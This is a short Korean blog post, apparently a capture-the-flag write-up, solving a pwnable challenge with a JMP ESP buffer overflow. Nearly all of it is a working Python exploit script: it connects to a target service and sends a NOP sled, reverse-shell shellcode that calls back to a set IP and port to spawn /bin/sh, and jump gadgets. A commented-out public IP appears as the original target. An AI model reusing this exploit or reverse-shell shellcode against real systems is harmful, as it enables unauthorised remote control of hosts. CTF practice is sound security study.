티스토리 뷰
JMP ESP 쓰면 됨.
내 서버가 없어서 친구서버 빌려 Reverse Shellcode를 통하여 품.
1 2 3 | 080483dc <main>: 80483dc: 8d 7f 06 lea 0x6(%edi),%edi 80483df: ff e7 jmp *%edi | cs |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 | #!/usr/bin/env python #-*-coding:utf8-*- from socket import * from struct import * p = lambda x : pack("<L", x) s = socket(AF_INET, SOCK_STREAM) #s.connect(("54.163.248.69", 9000)) s.connect(("localhost", 9000)) SHELLCODE = ( "\x68" "\x7f\x01\x01\x01" # IP ADDRESS 대회때는 다른 IP "\x5e\x66\x68" "\xd9\x03" # PORT NUMBER "\x5f\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02" "\x89\xe1\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79" "\xf9\xb0\x66\x56\x66\x57\x66\x6a\x02\x89\xe1\x6a" "\x10\x51\x53\x89\xe1\xcd\x80\xb0\x0b\x52\x68\x2f" "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" "\xeb\xce" ) JMPESP = p(0x080488B0) JMPEDI = "\x8d\x7f\x06\xff\xe7" print "[*] exploit start" s.recv(4096) payload = "\x90" * (118 - len(SHELLCODE)) payload += SHELLCODE payload += JMPESP payload += JMPEDI s.send("echo\x20" + payload + "\n") print "[*] end" | cs |
'Pwnable > CTF' 카테고리의 다른 글
| Volga CTF 2014 [exploit 100] (0) | 2015.01.28 |
|---|---|
| CSAW 2012 [Challenge1] (0) | 2015.01.23 |
| CodeGate 2014 [ Angry Doreamon ] (2) | 2015.01.14 |
| Plaid CTF 2013 [ropasaurusrex] (0) | 2014.12.13 |
| CodeGate Junior 2014 [nuclear] (0) | 2014.12.12 |
댓글